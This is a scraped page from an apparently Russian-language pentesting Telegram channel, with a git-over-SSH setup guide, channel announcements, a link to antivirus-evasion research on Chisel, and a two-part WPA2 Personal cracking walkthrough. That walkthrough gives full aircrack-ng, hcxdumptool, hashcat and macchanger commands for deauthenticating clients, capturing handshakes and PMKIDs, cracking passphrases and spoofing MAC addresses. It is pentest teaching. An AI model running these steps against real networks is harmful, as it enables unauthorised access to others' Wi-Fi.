REDtalk
1.07K subscribers
83 photos
1 video
11 files
98 links
Здесь вы найдете всё из мира ИБ. Говорим простыми словами о сложном. С нами кибербезопасность – ваш компаньон в цифровом мире. Вместе к безопасному будущему! 🌐🔐

По вопросам сотрудничества: @closed_character
Download Telegram
✈️ Привет!

Недавно мне понадобилось быстро развернуть git-сервер, но разворачивать что-то крупное было лень, поэтому покажу затерянный временем способ создания удаленного git-репозитория без использования gitlab, Gogs или Gitea.

Git использует 2 протокола передачи данных — HTTP и SSH. Для людей, которые только начали знакомится с git, использование первого протокола проблем не вызывает, а вот со вторым начинаются затупы на этапе настройки доступа через открытые ключи.

На самом деле SSH в git работает буквально так, как мы привыкли его использовать — подключается с именем пользователя git по публичному ключу и открывает оболочку, но не bash или zsh, а git-shell. Она ограничивает лишний доступ к системе и работает только с файлами репозитория. При этом директории с именами репозиториев должны иметь формат <имя_репы>.git . Далее показан пример настройки доступа через ssh.
apt update && apt install -y git

# Создание пользователя git
useradd -m git -s /usr/bin/git-shell

# Включение авторизации по публичным ключам
sed -i 's/^#*PubkeyAuthentication.*/PubkeyAuthentication yes/' /etc/ssh/sshd_config
sudo systemctl restart sshd

# Создание .ssh директории и файла authorized_keys
mkdir -p /home/git/.ssh
touch /home/git/.ssh/authorized_keys
chmod 700 /home/git/.ssh
chmod 600 /home/git/.ssh/authorized_keys
chown -R git:git /home/git/.ssh
echo 'ssh-ed25519 <ПУБЛИЧНЫЙ_КЛЮЧ_С_ДРУГОГО_УСТРОЙСТВА>' >> /home/git/.ssh/authorized_keys

# Создание репозитория
REPO_NAME="repo"
su -s /bin/bash git -c "mkdir -p ~/$REPO_NAME.git && cd ~/$REPO_NAME.git && git init --bare"


Всё это будет нормально работать на любой виртуалке с минимальной конфигурацией. Теперь можно пушить свою ветку на удаленный репозиторий:
REPO_NAME="repo"
git remote add origin "ssh://git@<HOST>:$REPO_NAME.git"
git push remote master


#ToolTricks
Please open Telegram to view this post
VIEW IN TELEGRAM
6❤‍🔥31
Привет, друзья! 👋
На связи команда канала Redtalk, и у нас отличные новости! В нашем ламповом кибер-мирке уже 900 хацкеров! 🔥 А это значит, что пора сделать анонс нашего мерча!❤️
Как только нас станет 1000, мы устроим розыгрыш среди подписчиков!
Спасибо каждому, кто с нами! Вы делаете наш канал живым и по-настоящему крутым 😎

#Redtalk
Please open Telegram to view this post
VIEW IN TELEGRAM
10❤‍🔥553😁2
Привет! 👀

Мы сами очень хотели попасть на Offzone, но в этот раз не сложилось
Зато есть классный постик от наших друзей! 👍
Please open Telegram to view this post
VIEW IN TELEGRAM
6
Forwarded from RedBlue Notes
RedBlue Notes на OFFZONE 2025!!

Хоть сегодня только первый день конференции, но я уже получил море положительных эмоций. Послушал доклад легендарного Евгения, спаял себе новый аддон и ещё 1 получил за квест, пополнил свою ИБ библиотеку ресёчем.

В моей коллекции +-10 аддонов, что по меркам конфы много. Но я встретил того, кто собрал ЁЛЕУ из кучи аддонов. Просто вау 🔝
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
622
notachisel.gif
4.7 MB
👽 Привет!

А я провел еще один небольшой анализ сигнатур антивирусов. На этот раз — Chisel. Уж очень нужен был для редтима инструмент проброса защищенного ресерс-прокси. Материала получилось меньше по сравнению с предыдущим ресерчем, но всё еще достаточно для Markdown :)

🔗Форкаем Chisel — Читать онлайн без регистрации

Приятного чтения!

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
853
Друзья, привет🤗!!!

А у нас завтра намечается стрим с нашими друзьями из СБ Про Бизнес 🤩!
Начинающим специалистам и ребятам из смежных сфер и бизнеса будет особенно полезно
42
Разговор с "ХАКЕРОМ"!

Что такое "взлом системы"? Да это же по сути - ПЕНТЕСТ!!!
Парням "по ту сторону закона" легко, их ничто не ограничивает... А на этой стороне закона, куча ограничений в работе, поэтому опыт от работы, значительно серьезней. Если это твоя работа, и каждый день ты занимаешься только этим... Волей не волей, превратишься в супер специалиста☝️

И мы решили провести СТРИМ!!!
У нас в гостях ПЕНТЕСТЕР со стажем!!! Создатель ТГ Канала https://t.me/REDTalk_base

♦️Александр Негода♦️@closed_character
и мы будем с ним разговаривать про взломы систем, хакинг, пентест и многое другое!!!
Поскольку общение будет online готовьте вопросики😉

Стрим будет по ссылке:

https://telemost.yandex.ru/j/77693374624664

Когда: 4 сентября в 20.30

И приходите вовремя...
Версия яндекстелемост бесплатная, поэтому ТОЛЬКО 50 Человек, сможет попасть на стрим🤷‍♂️ остальные в этот раз "мимо"...

Полезно будет для БИЗНЕСА☝️ А то, до сих пор считают, что хакер это парень в капюшоне 🤦‍♂️ А это уже давно серьезный бизнес!!!

P.S. Мы подготовили небольшой сувенир, сделанный "собственными руками", за лучший вопрос! Выберем победителя и подарим ему😉
Фото сувенира будет опубликовано завтра в канале))
7221
Привет, друзья! 🖥

Хотим рассказать про наших коллег и друзей из компании Актив — 🔗aktiv.consulting. Они специализируются на широком спектре услуг в мире ИБ — это аудиты, пентесты, построение ИБ-процессов, бумажная безопасность и проверка требований регуляторов.

Недавно у них вышел 🔗пост про виды железок, используемых в процессе тестирования на проникновение физического периметра организаций.

Рекомендуем к просмотру! 👍
Please open Telegram to view this post
VIEW IN TELEGRAM
6👌4❤‍🔥22
Привет, друзья! 👋

Все эти ваши пентесты давно уже не просто "галочка” в документиках, а реальный способ понять, насколько ваша компания уязвима перед методами, которыми пользуются реальные злоумышленники.

Игнорировать это всё равно, что играть в рулетку с собственной репутацией, данными клиентов и бизнесом в целом.

Недавно мы подробно обсудили эту тему на стриме с ребятами с канала СБПроБизнес.

Выбирайте любимую площадку. И приятного просмотра:

📺YouTube

📺Rutube

📝Дзен

📺ВК
Please open Telegram to view this post
VIEW IN TELEGRAM
641
Всем привет! 👋Сегодня немного поговорим о том, как пентестить Wi-Fi сети, а именно WPA2 Personal. Берите чашечку кофе и присаживайтесь.☕️


WPA2 Personal🐈‍⬛

Самый популярный протокол, используемый в персональных сетях Wi-Fi на данный момент, — это WPA2. Новая версия, WPA3, постепенно отвоёвывает себе место под солнцем👊, но всё ещё встречается гораздо реже. Более старые протоколы WEP и WPA практически не используются.

🔘 Первым типом атаки на WPA2, который рассмотрим, является перехват handshake, во время которого клиент и точка доступа обмениваются ключами. 🔑

Для данной атаки будем использовать утилиты семейства aircrack-ng (также можно использовать утилиту airgeddon для удобства).

🔹 Для начала необходимо включить режим мониторинга сети у интерфейса:
sudo airmon-ng start wlan0


Иногда может выскакивать сообщенияу с просьбой “убить” процессы, которые могут помещать перевести наш интерфейс в режим мониторинга.

Для этого достаточно ввести команду airmon-ng check kill.

🔹 Следующим шагом будем поиск доступных сетей Wi-Fi и клиентов. Сделать это можно будет с помощью утилиты airodump-ng. Флаг -w позволит сохранит результаты сканирования.
sudo airodump-ng wlan0mon -c 1 -w NETWORK


🔹 Иногда полезно посмотреть карту точек доступа и подключенных к ним клиентов, чтобы понять на какую точку доступа нам нацелиться. Сделать это можно с помощью утилиты airgraph-ng. В параметрах передаем тип изображения, который хотим сохранить, а также файл с результатами сканирования:

sudo airgraph-ng -i NETWORK.csv -g CAPR -o NETWORK.png


После определения нашей цели мы можем подождать пока кто-то подключиться к точке доступа или же начать деаутентификацию клиентов уже подключенных к точке.

🔹 Для начала настроим airodump на захват пакетов с определенной точки доступа и канала:
sudo airodump-ng -c 11 wlan0mon --essid wifinet -w NETWORK


🔹 Деаутентификацию клиентов выполним с помощью утилиты aireplay-ng:
sudo aireplay-ng -0 5 -a 60:3E:41:FE:30:83 -c 5C:12:B1:9B:ED:1A wlan0mon


Это заставит клиента переподключиться к точке доступа, что позволит нам перехватить handshake.📞

После захвата handshake airodump-ng выведет соответствующее сообщение:

kali@kali[/wifi]$ airodump-ng wlan0mon -c 1 -w NETWORK
06:11:03 Created capture file "NETWORK.cap".


🔹 Однако не стоит сразу сломя голову начать брутить handshake. Очень часто утилита airodump захватывает не все нужные нам пакеты (а их 4). Поэтому стоит взглянуть на захваченный файл и проверить, а все ли дома. Сделать это можно в ручную с помощью Wireshark или с помощью утилит cowpatty.

kali@kali[/wifi]$ cowpatty -c -r NETWORK
capcowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.


Данное сообщение означает, что все в порядке и можем смело брутить наш файл.

🔹 Для брутфорсе захваченного handshake подойдет cowpatty или aircrack-ng.
sudo aircrack-ng -w wordlist.txt -0 NETWORK.cap
Please open Telegram to view this post
VIEW IN TELEGRAM
64😁11
<продолжение>


🔘 Следующий тип атаки на WPA2 Personal это захват PMKID.

PMKID (Pairwise Master Key Identifier) — это идентификатор, используемый в протоколе WPA/WPA2 для установления защищённого соединения между клиентом и точкой доступа Wi-Fi. Подробнее можете прочитать тут:
🔗🔗🔗

Для выполнения данной атаки можем использовать утилиту hxcdumptool.

🔹Для начала надо запустить сканирование сети и определить уязвимые точки для атаки PMKID. (прим. в примере показа не последняя версия hcxdumptool).

hcxdumptool -i wlan0mon --enable_status=3


🔹 После определения уязвимой цели запускаем заново тулзу
hcxdumptool -i wlan0mon --enable_status=3 --filterlist_ap=С1:33:E7:F5:65:91 --filtermode=2 -o PMKID.pcap


В случае успеха мы получим следующее сообщение:
initialization of hcxdumptool 6.2.5...
warning possible interfere: NetworkManager is running with pid 101

...
[SNIP]

05:15:18 2412/1 0e2e37d6886d d8d63deb29d5 [PMKID:p243frfa5erfe3vf64w1922ew321be35e6462
KDV:2]
...


🔹После успешного захвата PMKID необходимо преобразовать pcap файл в hash.
hcxpcapngtool -o hash PMKID.pcap


🔹Для взлома хэша можем воспользоваться утилитой hashcat с флагом -m 22000
hashcat -m 22000 --force hash wordlist.txt


Также необходимо помнить, что для точки доступа может быть настроен белый список mac-адресов, что не позволит нам подключиться в случае даже успешного перебора пароля. К счастью для атакующих, обойти данный механизм защиты можно легко с помощью утилиты macchanger.

Для этого отключаем наш интерфейс и присваиваем ему mac-адрес клиента. (помните, что перед подключением к точке доступа нам необходимо деаутентифицировать клиента, чей mac-адрес мы себе присвоили, иначе мы не сможем подключиться.)
sudo ifconfig wlan0 down
sudo macchanger wlan0 -m 3E:48:72:B7:62:2A
sudo ifconfig wlan0 up


В следующей части посмотрим уже на атаки на WPA Enterpise сети. А пока подписывайтесь на канал и приятного чтения.👋
Please open Telegram to view this post
VIEW IN TELEGRAM
632👌1
Привет! 🤥

Недавно я перечитывал свои посты и наткнулся на один из самых старых — про переполнение стека. Вспомнил молодость, словил испанский стыд и решил сделать ремейк, а точнее, полностью переписать пост. Получилось небольшая статья про введение в эксплуатацию бинарных уязвимостей на простом примере задачи в формате ctf. Описаны базовые виды защиты памяти, пошагово создан CTF-таск с подробным решением.

Приятного чтения! 🔗Читать

Но это еще не всё! Cейчас в тренде импортозамещение, так, что я тоже решил не отставать и создал свой небольшой сайт: 🔗read.pyfffe.site. Туда переехали материалы из Notion, и теперь все гифки в постах нормально загружаются без впн (да, всё было ради гифок 👸). Да и в целом хорошо бы иметь полный контроль над своим ресурсом (просьба не пробовать его получать 👾).

Теперь всё, спасибо за внимание!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥1032